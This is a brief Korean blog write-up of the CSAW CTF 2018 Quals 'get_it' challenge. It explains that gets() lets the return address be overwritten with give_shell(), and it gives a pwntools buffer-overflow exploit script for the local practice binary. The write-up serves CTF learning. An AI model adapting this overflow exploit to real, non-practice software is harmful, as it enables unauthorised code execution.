ii4gsp
CSAW CTF 2018 Quals - get_it? 본문
간단한다.
gets()함수로 ret를 give_shell()함수로 덮어주면 된다.
SFP 포함 32byte이다.
from pwn import *
p = process('/home/ii4gsp/get_it')
e = ELF('/home/ii4gsp/get_it')
give_shell = e.symbols['give_shell']
payload = ''
payload += '\x90' * 32
payload += p64(give_shell)
p.sendline(payload)
p.interactive()
'시스템 해킹 > CTF' 카테고리의 다른 글
Angstrom CTF 2019 - Chain of Rope (0) | 2020.03.04 |
---|---|
Angstrom CTF 2019 - Aquarium (0) | 2020.03.04 |
CSAW CTF 2018 Quals - bigboy (0) | 2020.03.03 |
SSG_CTF - SimpleBOF (0) | 2020.02.25 |
[DEFCON 2015] r0pbaby (0) | 2020.02.20 |
Comments